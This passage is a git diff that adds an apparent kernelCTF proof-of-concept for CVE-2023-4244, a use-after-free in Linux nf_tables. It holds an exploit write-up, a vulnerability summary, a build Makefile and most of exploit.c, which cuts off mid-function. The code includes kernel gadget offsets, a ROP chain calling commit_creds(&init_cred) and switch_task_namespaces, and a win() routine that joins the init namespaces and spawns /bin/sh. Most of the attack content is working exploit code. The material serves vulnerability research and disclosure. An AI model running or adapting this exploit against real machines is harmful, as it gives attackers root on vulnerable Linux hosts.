diff --git a/pocs/linux/kernelctf/CVE-2023-4244_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/docs/exploit.md new file mode 100644 index 00000000..1ad62146 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/docs/exploit.md @@ -0,0 +1,270 @@ +# Overview + +The vulnerability is caused by a race condition between the control plane and GC. + +```c +static int nft_delset(const struct nft_ctx *ctx, struct nft_set *set) +{ + int err; + + err = nft_trans_set_add(ctx, NFT_MSG_DELSET, set); + if (err < 0) + return err; + + if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT)) + nft_map_deactivate(ctx, set); // [1] + + nft_deactivate_next(ctx->net, set); + nft_use_dec(&ctx->table->use); + + return err; +} +``` + +Deleting an nft_set deactivates the set element in the `nft_delset` [1]. + +```c +static void nft_rbtree_gc(struct work_struct *work) +{ + struct nft_rbtree_elem *rbe, *rbe_end = NULL, *rbe_prev = NULL; + struct nft_set_gc_batch *gcb = NULL; + struct nft_rbtree *priv; + struct rb_node *node; + struct nft_set *set; + struct net *net; + u8 genmask; + + priv = container_of(work, struct nft_rbtree, gc_work.work); + set = nft_set_container_of(priv); + net = read_pnet(&set->net); + genmask = nft_genmask_cur(net); + + write_lock_bh(&priv->lock); + write_seqcount_begin(&priv->count); + for (node = rb_first(&priv->root); node != NULL; node = rb_next(node)) { + rbe = rb_entry(node, struct nft_rbtree_elem, node); + + if (!nft_set_elem_active(&rbe->ext, genmask)) + continue; + + /* elements are reversed in the rbtree for historical reasons, + * from highest to lowest value, that is why end element is + * always visited before the start element. + */ + if (nft_rbtree_interval_end(rbe)) { + rbe_end = rbe; + continue; + } + if (!nft_set_elem_expired(&rbe->ext)) + continue; + + if (nft_set_elem_mark_busy(&rbe->ext)) { + rbe_end = NULL; + continue; + } + + if (rbe_prev) { + rb_erase(&rbe_prev->node, &priv->root); + rbe_prev = NULL; + } + gcb = nft_set_gc_batch_check(set, gcb, GFP_ATOMIC); + if (!gcb) + break; + + atomic_dec(&set->nelems); + nft_set_gc_batch_add(gcb, rbe); // [2] + rbe_prev = rbe; + + if (rbe_end) { + atomic_dec(&set->nelems); + nft_set_gc_batch_add(gcb, rbe_end); + rb_erase(&rbe_end->node, &priv->root); + rbe_end = NULL; + } + node = rb_next(node); + if (!node) + break; + } + if (rbe_prev) + rb_erase(&rbe_prev->node, &priv->root); + write_seqcount_end(&priv->count); + write_unlock_bh(&priv->lock); + + rbe = nft_set_catchall_gc(set); + if (rbe) { + gcb = nft_set_gc_batch_check(set, gcb, GFP_ATOMIC); + if (gcb) + nft_set_gc_batch_add(gcb, rbe); + } + nft_set_gc_batch_complete(gcb); // [3] + + queue_delayed_work(system_power_efficient_wq, &priv->gc_work, + nft_set_gc_interval(set)); +} +``` + +If the set's GC function, `nft_rbtree_gc`, is called at the same time, it will add the expired elements to the GC batch [2]. It then calls `nft_set_gc_batch_complete` to release this element [3]. As a result, the deactivated element is once again deactiavted in the GC, leading to the vulnerability. + +We can trigger a UAF from this vulnerability as follows. First, create a victim set and a victim chain, and create an immediate expr pointing to the victim chain to create a dangling pointer. At this point, the victim chain's reference count (`nft_chain->use`) is set to 1. Then, we add a set element which is configured short timeout to this victim set that points to the victim chain. Now, the reference count of the victim chain becomes 2. Next, we delete the set to trigger the vulnerability. When the vulnerability is triggered, the victim chain's reference count is decremented twice to zero. Since the reference count of the victim chain is zero, the chain can be free. As a result, the victim chain is left as a dangling pointer in the immediate expr. + +# KASLR Bypass and Information Leak + +We used a timing side channel attack to leak the kernel base, and created a fake ops in the non-randomized CPU entry area (CVE-2023-0597) without leaking the heap address. + +# RIP Control + +```c +struct nft_chain { + struct nft_rule_blob __rcu *blob_gen_0; + struct nft_rule_blob __rcu *blob_gen_1; + struct list_head rules; + struct list_head list; + struct rhlist_head rhlhead; + struct nft_table *table; + u64 handle; + u32 use; + u8 flags:5, + bound:1, + genmask:2; + char *name; + u16 udlen; + u8 *udata; + + /* Only used during control plane commit phase: */ + struct nft_rule_blob *blob_next; +}; +``` + +When the vulnerability is triggered, the freed `chain->blob_gen_0` can be accessed via `immediate expr`. We leave the chain freed and spray an object to create a fake blob in `blob_gen_0`. + +```c +unsigned int +nft_do_chain(struct nft_pktinfo *pkt, void *priv) +{ + ... +do_chain: + if (genbit) + blob = rcu_dereference(chain->blob_gen_1); + else + blob = rcu_dereference(chain->blob_gen_0); + + rule = (struct nft_rule_dp *)blob->data; + last_rule = (void *)blob->data + blob->size; +next_rule: + regs.verdict.code = NFT_CONTINUE; + for (; rule < last_rule; rule = nft_rule_next(rule)) { + nft_rule_dp_for_each_expr(expr, last, rule) { + if (expr->ops == &nft_cmp_fast_ops) + nft_cmp_fast_eval(expr, ®s); + else if (expr->ops == &nft_cmp16_fast_ops) + nft_cmp16_fast_eval(expr, ®s); + else if (expr->ops == &nft_bitwise_fast_ops) + nft_bitwise_fast_eval(expr, ®s); + else if (expr->ops != &nft_payload_fast_ops || + !nft_payload_fast_eval(expr, ®s, pkt)) + expr_call_ops_eval(expr, ®s, pkt); + + if (regs.verdict.code != NFT_CONTINUE) + break; + } +``` + +```c +static void expr_call_ops_eval(const struct nft_expr *expr, + struct nft_regs *regs, + struct nft_pktinfo *pkt) +{ +#ifdef CONFIG_RETPOLINE + unsigned long e = (unsigned long)expr->ops->eval; +#define X(e, fun) \ + do { if ((e) == (unsigned long)(fun)) \ + return fun(expr, regs, pkt); } while (0) + + X(e, nft_payload_eval); + X(e, nft_cmp_eval); + X(e, nft_counter_eval); + X(e, nft_meta_get_eval); + X(e, nft_lookup_eval); + X(e, nft_range_eval); + X(e, nft_immediate_eval); + X(e, nft_byteorder_eval); + X(e, nft_dynset_eval); + X(e, nft_rt_get_eval); + X(e, nft_bitwise_eval); +#undef X +#endif /* CONFIG_RETPOLINE */ + expr->ops->eval(expr, regs, pkt); +} +``` + +`chain->blob_gen_0` is used in `nft_do_chain`, and `expr->ops->eval` is called to evaluate the expression in `expr_call_ops_eval`. We set the ops of the fake expr to the CPU entry area to control the RIP. We allocate the fake blob object larger than 0x2000 to use page allocator. + +# Post-RIP + +The ROP payload is stored in `chain->blob_gen_0` which is allocated by page allocator. + +When `eval()` is called, `RBX` points to `chain->blob_gen_0+0x10`, which is the beginning of the `nft_expr` structure. + +```c +void rop_chain(uint64_t* data){ + int i = 0; + + // nft_rule_blob.size > 0 + data[i++] = 0x100; + // nft_rule_blob.dlen > 0 + data[i++] = 0x100; + + // fake ops addr + data[i++] = PAYLOAD_LOCATION(1) + offsetof(struct cpu_entry_area_payload, nft_expr_eval); + + // current = find_task_by_vpid(getpid()) + data[i++] = kbase + POP_RDI_RET; + data[i++] = getpid(); + data[i++] = kbase + FIND_TASK_BY_VPID; + + // current += offsetof(struct task_struct, rcu_read_lock_nesting) + data[i++] = kbase + POP_RSI_RET; + data[i++] = RCU_READ_LOCK_NESTING_OFF; + data[i++] = kbase + ADD_RAX_RSI_RET; + + // current->rcu_read_lock_nesting = 0 (Bypass rcu protected section) + data[i++] = kbase + POP_RCX_RET; + data[i++] = 0; + data[i++] = kbase + MOV_RAX_RCX_RET; + + // Bypass "schedule while atomic": set oops_in_progress = 1 + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + OOPS_IN_PROGRESS; + data[i++] = kbase + MOV_RSI_RDI_RET; + + // commit_creds(&init_cred) + data[i++] = kbase + POP_RDI_RET; + data[i++] = kbase + INIT_CRED; + data[i++] = kbase + COMMIT_CREDS; + + // find_task_by_vpid(1) + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + FIND_TASK_BY_VPID; + + data[i++] = kbase + POP_RSI_RET; + data[i++] = 0; + + // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) + data[i++] = kbase + MOV_RDI_RAX_RET; + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + INIT_NSPROXY; + data[i++] = kbase + SWITCH_TASK_NAMESPACES; + + data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE; + data[i++] = 0; + data[i++] = 0; + data[i++] = _user_rip; + data[i++] = _user_cs; + data[i++] = _user_rflags; + data[i++] = _user_sp; + data[i++] = _user_ss; +} +``` \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-4244_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/docs/vulnerability.md new file mode 100644 index 00000000..76b71b5f --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/docs/vulnerability.md @@ -0,0 +1,12 @@ +- Requirements: + - Capabilities: CAP_NET_ADMIN + - Kernel configuration: CONFIG_NETFILTER, CONFIG_NF_TABLES + - User namespaces required: Yes +- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cfed7e1b1f8e (netfilter: nf_tables: add set garbage collection helpers) +- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5f68718b34a531a556f2f50300ead2862278da26 (netfilter: nf_tables: GC transaction API to avoid race with control plane) +- Affected Version: v6.4 - v6.5-rc5 +- Affected Component: net/netfilter +- Cause: Use-After-Free +- Syscall to disable: disallow unprivileged username space +- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-4244 +- Description: A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. Due to a race condition between nf_tables netlink control plane transaction and nft_set element garbage collection, it is possible to underflow the reference counter causing a use-after-free vulnerability. We recommend upgrading past commit 3e91b0ebd994635df2346353322ac51ce84ce6d8. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/Makefile b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/Makefile new file mode 100644 index 00000000..f838f98d --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/Makefile @@ -0,0 +1,35 @@ +LIBMNL_DIR = $(realpath ./)/libmnl_build +LIBNFTNL_DIR = $(realpath ./)/libnftnl_build + +exploit: + gcc -o exploit exploit.c -L$(LIBNFTNL_DIR)/install/lib -L$(LIBMNL_DIR)/install/lib -lnftnl -lmnl -I$(LIBNFTNL_DIR)/libnftnl-1.2.5/include -I$(LIBMNL_DIR)/libmnl-1.0.5/include -static -s + +prerequisites: libmnl-build libnftnl-build + +libmnl-build : libmnl-download + tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2 + cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install` + cd $(LIBMNL_DIR)/libmnl-1.0.5 && make + cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install + +libnftnl-build : libmnl-build libnftnl-download + tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.5.tar.xz + cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/lib/pkgconfig ./configure --enable-static --prefix=`realpath ../install` + cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/lib make + cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && make install + +libmnl-download : + mkdir $(LIBMNL_DIR) + wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2 + +libnftnl-download : + mkdir $(LIBNFTNL_DIR) + wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.5.tar.xz + +run: + ./exploit + +clean: + rm -rf $(LIBMNL_DIR) + rm -rf $(LIBNFTNL_DIR) + rm -f exploit diff --git a/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/exploit b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/exploit new file mode 100755 index 00000000..75975cd3 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/exploit.c b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/exploit.c new file mode 100644 index 00000000..0065cb9a --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/exploit.c @@ -0,0 +1,847 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include + +#include "netlink_utils.h" + +#define BUF_SIZE 0x1000 * 0x100 + +#define FIND_TASK_BY_VPID 0x1bbe60 +#define SWITCH_TASK_NAMESPACES 0x1c3a30 +#define COMMIT_CREDS 0x1c55a0 +#define INIT_CRED 0x2876960 +#define INIT_NSPROXY 0x2876720 +#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0x1201146 +#define OOPS_IN_PROGRESS 0x3444338 +#define RCU_READ_LOCK_NESTING_OFF 0x474 + +#define PUSH_RBX_POP_RSP 0xf89a31 // 0xffffffff81f89a31 : push rbx ; and byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; jmp 0xffffffff82404c80 +#define POP_RDI_RET 0x0e89fe // 0xffffffff810e89fe : pop rdi ; jmp 0xffffffff82404c80 +#define POP_RSI_RET 0x0e8a70 // 0xffffffff810e8a70 : pop rsi ; jmp 0xffffffff82404c80 +#define ADD_RAX_RSI_RET 0x038160 // 0xffffffff81038160 : add rax, rsi ; jmp 0xffffffff82404c80 +#define POP_RCX_RET 0x11581f6 // 0xffffffff821581f6 : pop rcx ; jmp 0xffffffff82404c80 +#define MOV_RAX_RCX_RET 0x72718b // 0xffffffff8172718b : mov qword ptr [rax], rcx ; jmp 0xffffffff82404c80 +#define MOV_RDI_RAX_RET 0x1f4605 // 0xffffffff811f4605 : mov rdi, rax ; test esi, esi ; jne 0xffffffff811f45b4 ; jmp 0xffffffff82404c80 +#define POP_RSP_RET 0x008999 // 0xffffffff81008999 : pop rsp ; jmp 0xffffffff82404c80 +#define MOV_RSI_RDI_RET 0x2fcc79 // 0xffffffff812fcc79 : mov qword ptr [rsi], rdi ; jmp 0xffffffff82404c80 + +uint64_t kbase = 0; + +char* buf; +struct nlmsghdr * nlh; +struct mnl_nlmsg_batch * batch; +struct mnl_socket * nl; +uint32_t portid; +uint8_t family = NFPROTO_IPV4; +int seq = 0; + +char * table1_name = "table1"; +char * set_rop_name = "set_rop"; +char * chain_base_name = "chain1"; +char * chain_rop_name = "chain_rop"; + +size_t KERNEL_BASE = 0; + +void win(){ + setns(open("/proc/1/ns/mnt", O_RDONLY), 0); + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + + char* shell[] = { + "/bin/sh", + NULL, + }; + + execve(shell[0], shell, NULL); + + while(1); +} + +void set_affinity(int cpuid){ + cpu_set_t my_set; + int cpu_cores = sysconf(_SC_NPROCESSORS_ONLN); + + if (cpu_cores == 1) return; + + CPU_ZERO(&my_set); + + CPU_SET(cpuid, &my_set); + + if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) { + perror("[-] sched_setaffinity()"); + exit(EXIT_FAILURE); + } +} + +/* +* Add a network interface. +* Equivalent to `ip link add ...`. +*/ +int net_if(char *type, int n, int opt) { + + struct nlmsghdr *msg; + struct nlattr *opts; + struct ifinfomsg ifinfo = {}; + char name[0x100] = { 0 }; + int sk; + + strcpy(name, type); + + if (n >= 0) + snprintf(name, sizeof(name), "%s-%d", type, n); + + // Initalize a netlink socket and allocate a nlmsghdr + sk = nl_init_request(RTM_NEWLINK, &msg, NLM_F_REQUEST|NLM_F_CREATE); + if (!sk) { + perror("nl_init_request()"); + return -1; + } + + ifinfo.ifi_family = AF_UNSPEC; + ifinfo.ifi_type = PF_NETROM; + ifinfo.ifi_index = 0; + ifinfo.ifi_flags = opt; + ifinfo.ifi_change = 1; + + nlmsg_append(msg, &ifinfo, sizeof(ifinfo), NLMSG_ALIGNTO); + + nla_put_string(msg, IFLA_IFNAME, name); + opts = nla_nest_start(msg, IFLA_LINKINFO); + nla_put_string(msg, IFLA_INFO_KIND, type); + nla_nest_end(msg, opts); + + // Send the netlink message and deallocate resources + return nl_complete_request(sk, msg); +} + +void write_file(const char *filename, char *text) { + int fd = open(filename, O_RDWR | O_CREAT, 0600); + + write(fd, text, strlen(text)); + close(fd); +} + +void new_ns(void) { + uid_t uid = getuid(); + gid_t gid = getgid(); + char buffer[0x100]; + + unshare(CLONE_NEWUSER | CLONE_NEWNS); + + unshare(CLONE_NEWNET); + + write_file("/proc/self/setgroups", "deny"); + + snprintf(buffer, sizeof(buffer), "0 %d 1", uid); + write_file("/proc/self/uid_map", buffer); + snprintf(buffer, sizeof(buffer), "0 %d 1", gid); + write_file("/proc/self/gid_map", buffer); + + net_if("lo", -1, IFF_UP); +} + +uint64_t _user_rip = (uint64_t) win; +uint64_t _user_cs = 0; +uint64_t _user_rflags = 0; +uint64_t _user_sp = 0; +uint64_t _user_ss = 0; + +void save_state(void) { + __asm__(".intel_syntax noprefix;" + "mov _user_cs, cs;" + "mov _user_ss, ss;" + "mov _user_sp, rsp;" + "pushf;" + "pop _user_rflags;" + ".att_syntax"); + return; +} + +#define TRIG_HOST "127.0.0.1" +#define TRIG_PORT 1337 + +/* Connect to a server in a specific port to trigger netfilter hooks */ +void trig_net_sock(void) { + int sockfd = 00; + struct sockaddr_in servaddr, cli; + + bzero(&servaddr, sizeof(servaddr)); + bzero(&cli, sizeof(cli)); + + sockfd = socket(AF_INET, SOCK_STREAM, 0); + if(sockfd == -1) + printf("[-] Socket creation failed"); + + servaddr.sin_family = AF_INET; + servaddr.sin_addr.s_addr = inet_addr(TRIG_HOST); + servaddr.sin_port = htons(TRIG_PORT); + + if(connect(sockfd, (struct sockaddr*) &servaddr, sizeof(servaddr)) != 0) + printf("[-] Connection with server failed"); + + write(sockfd, "AAAA", 4); + + close(sockfd); + + return; +} + +/* Set up a server to receive hook-triggering output packets */ +void setup_trig_server(void) { + int sfd = 0, sock = 0; + struct sockaddr_in address; + int opt = 1; + int addrlen = sizeof(address); + char buffer[1024] = { 0 }; + + if((sfd = socket(AF_INET, SOCK_STREAM, 0)) == 0) + printf("[-] Error at socket()"); + + if(setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR | SO_REUSEPORT, &opt, sizeof(opt))) + printf("[-] Error at setsockopt()"); + + address.sin_family = AF_INET; + address.sin_addr.s_addr = INADDR_ANY; + address.sin_port = htons(TRIG_PORT); + + if(bind(sfd, (struct sockaddr*)&address, sizeof(address)) < 0) + printf("[-] Error at bind()"); + + if(listen(sfd, 3) < 0) + printf("[-] Error at listen()"); + + if((sock = accept(sfd, (struct sockaddr*)&address, (socklen_t*)&addrlen)) < 0) + printf("[-] Error at accept()"); + + read(sock, buffer, 4); + + close(sock); + close(sfd); + + return; +} + +void trig_sock(){ + int sfd = 0; + + /* Set up server at TRIG_PORT in a new process */ + sfd = fork(); + if(sfd == 0) { + setup_trig_server(); + exit(0); + } + + /* Trigger the network hook */ + trig_net_sock(); +} + +// CPU entry area pointers. We prepare some memory here that will be referenced +// by the ROP chains. +// We need: +// - the struct nft_expr_ops { .eval } member +#define CPU_ENTRY_AREA_BASE(cpu) (0xfffffe0000001000ull + (uint64_t)cpu * 0x3b000) +#define PAYLOAD_LOCATION(cpu) (CPU_ENTRY_AREA_BASE(cpu) + 0x1f58) + +struct cpu_entry_area_payload { +union { + struct { + // function to call to evaluate the expression + uint64_t nft_expr_eval; + }; + uint64_t regs[16]; +}; +}; + +void rop_chain(uint64_t* data){ + int i = 0; + + // nft_rule_blob.size > 0 + data[i++] = 0x100; + // nft_rule_blob.dlen > 0 + data[i++] = 0x100; + + // fake ops addr + data[i++] = PAYLOAD_LOCATION(1) + offsetof(struct cpu_entry_area_payload, nft_expr_eval); + + // current = find_task_by_vpid(getpid()) + data[i++] = kbase + POP_RDI_RET; + + data[i++] = getpid(); + data[i++] = kbase + FIND_TASK_BY_VPID; + + // current += offsetof(struct task_struct, rcu_read_lock_nesting) + data[i++] = kbase + POP_RSI_RET; + data[i++] = RCU_READ_LOCK_NESTING_OFF; + data[i++] = kbase + ADD_RAX_RSI_RET; + + // current->rcu_read_lock_nesting = 0 (Bypass rcu protected section) + data[i++] = kbase + POP_RCX_RET; + data[i++] = 0; + data[i++] = kbase + MOV_RAX_RCX_RET; + + // Bypass "schedule while atomic": set oops_in_progress = 1 + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + OOPS_IN_PROGRESS; + data[i++] = kbase + MOV_RSI_RDI_RET; + + // commit_creds(&init_cred) + data[i++] = kbase + POP_RDI_RET; + data[i++] = kbase + INIT_CRED; + data[i++] = kbase + COMMIT_CREDS; + + // find_task_by_vpid(1) + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + FIND_TASK_BY_VPID; + + data[i++] = kbase + POP_RSI_RET; + data[i++] = 0; + + // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) + data[i++] = kbase + MOV_RDI_RAX_RET; + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + INIT_NSPROXY; + data[i++] = kbase + SWITCH_TASK_NAMESPACES; + + data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE; + data[i++] = 0; + data[i++] = 0; + data[i++] = _user_rip; + data[i++] = _user_cs; + data[i++] = _user_rflags; + data[i++] = _user_sp; + data[i++] = _user_ss; +} + +void setup_table_chain(){ + struct nftnl_table * table = nftnl_table_alloc(); + nftnl_table_set_str(table, NFTNL_TABLE_NAME, table1_name); + nftnl_table_set_u32(table, NFTNL_TABLE_FLAGS, 0); + + struct nftnl_chain * chain1 = nftnl_chain_alloc(); + nftnl_chain_set_str(chain1, NFTNL_CHAIN_TABLE, table1_name); + nftnl_chain_set_str(chain1, NFTNL_CHAIN_NAME, chain_base_name); + nftnl_chain_set_u32(chain1, NFTNL_CHAIN_FLAGS, 0); + nftnl_chain_set_str(chain1, NFTNL_CHAIN_TYPE, "filter"); + nftnl_chain_set_u32(chain1, NFTNL_CHAIN_HOOKNUM, NF_INET_LOCAL_IN); + nftnl_chain_set_u32(chain1, NFTNL_CHAIN_PRIO, 10); + nftnl_chain_set_u32(chain1, NFTNL_CHAIN_POLICY, NF_ACCEPT); + + struct nftnl_chain * chain_rop = nftnl_chain_alloc(); + nftnl_chain_set_str(chain_rop, NFTNL_CHAIN_TABLE, table1_name); + nftnl_chain_set_str(chain_rop, NFTNL_CHAIN_NAME, chain_rop_name); + + struct nftnl_rule * rule_dangling_4 = nftnl_rule_alloc(); + + nftnl_rule_set_str(rule_dangling_4, NFTNL_RULE_TABLE, table1_name); + nftnl_rule_set_str(rule_dangling_4, NFTNL_RULE_CHAIN, chain_base_name); + + struct nftnl_expr * expr_immediate = nftnl_expr_alloc("immediate"); + nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT); + nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO); + nftnl_expr_set_str(expr_immediate, NFTNL_EXPR_IMM_CHAIN, chain_rop_name); + nftnl_rule_add_expr(rule_dangling_4, expr_immediate); + + batch = mnl_nlmsg_batch_start(buf, BUF_SIZE); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE, seq++); + nftnl_table_nlmsg_build_payload(nlh, table); + mnl_nlmsg_batch_next(batch); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "mnl_socket_send"); + } + + batch = mnl_nlmsg_batch_start(buf, BUF_SIZE); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE, seq++); + nftnl_chain_nlmsg_build_payload(nlh, chain_rop); + mnl_nlmsg_batch_next(batch); + + nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE, seq++); + nftnl_chain_nlmsg_build_payload(nlh, chain1); + mnl_nlmsg_batch_next(batch); + + nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++); + nftnl_rule_nlmsg_build_payload(nlh, rule_dangling_4); + mnl_nlmsg_batch_next(batch); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "mnl_socket_send"); + } +} + +void del_chain(char* chain_name){ + struct nftnl_chain * chain = nftnl_chain_alloc(); + nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, table1_name); + nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name); + nftnl_chain_set_u32(chain, NFTNL_CHAIN_FLAGS, 0); + + batch = mnl_nlmsg_batch_start(buf, BUF_SIZE); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELCHAIN, family, 0, seq++); + nftnl_chain_nlmsg_build_payload(nlh, chain); + mnl_nlmsg_batch_next(batch); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "mnl_socket_send"); + } +} + +void trigger(char * trig_set_name, char * trig_chain_name){ + uint32_t key_size = 0xc; + + struct nftnl_set * set = nftnl_set_alloc(); + + nftnl_set_set_str(set, NFTNL_SET_TABLE, table1_name); + nftnl_set_set_str(set, NFTNL_SET_NAME, trig_set_name); + nftnl_set_set_u32(set, NFTNL_SET_FLAGS, NFT_SET_INTERVAL | NFT_SET_TIMEOUT | NFT_SET_MAP); + nftnl_set_set_u32(set, NFTNL_SET_KEY_LEN, key_size); + nftnl_set_set_u32(set, NFTNL_SET_ID, 1337); + nftnl_set_set_u32(set, NFTNL_SET_GC_INTERVAL, 1); + nftnl_set_set_u32(set, NFTNL_SET_DATA_TYPE, NFT_DATA_VERDICT); + + uint8_t key_data[0x200] = {0,}; + uint8_t key_end_data[0x2000] = {0,}; + + unsigned long user_data[0x100] = {0,}; + + struct nftnl_set * set_elem_trigger = nftnl_set_alloc(); + + nftnl_set_set_str(set_elem_trigger, NFTNL_SET_TABLE, table1_name); + nftnl_set_set_str(set_elem_trigger, NFTNL_SET_NAME, trig_set_name); + + struct nftnl_set_elem * elem1 = nftnl_set_elem_alloc(); + + nftnl_set_elem_set(elem1, NFTNL_SET_ELEM_KEY, &key_data, key_size); + nftnl_set_elem_set_str(elem1, NFTNL_SET_ELEM_CHAIN, trig_chain_name); + nftnl_set_elem_set_u32(elem1, NFTNL_SET_ELEM_VERDICT, NFT_GOTO); + nftnl_set_elem_set_u64(elem1, NFTNL_SET_ELEM_TIMEOUT, 2); + + nftnl_set_elem_add(set_elem_trigger, elem1); + + struct nftnl_rule * rule_dummy_rop = nftnl_rule_alloc(); + + nftnl_rule_set_str(rule_dummy_rop, NFTNL_RULE_TABLE, table1_name); + nftnl_rule_set_str(rule_dummy_rop, NFTNL_RULE_CHAIN, chain_rop_name); + + struct nftnl_rule * rule_dummy = nftnl_rule_alloc(); + + nftnl_rule_set_str(rule_dummy, NFTNL_RULE_TABLE, table1_name); + nftnl_rule_set_str(rule_dummy, NFTNL_RULE_CHAIN, chain_base_name); + + batch = mnl_nlmsg_batch_start(buf, BUF_SIZE); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWSET, family, NLM_F_CREATE, seq++); + nftnl_set_nlmsg_build_payload(nlh, set); + mnl_nlmsg_batch_next(batch); + + for(int i = 0 ; i < 0x400; i++){ + nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++); + nftnl_rule_nlmsg_build_payload(nlh, rule_dummy_rop); + mnl_nlmsg_batch_next(batch); + } + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "mnl_socket_send"); + } + + batch = mnl_nlmsg_batch_start(buf, BUF_SIZE); + + 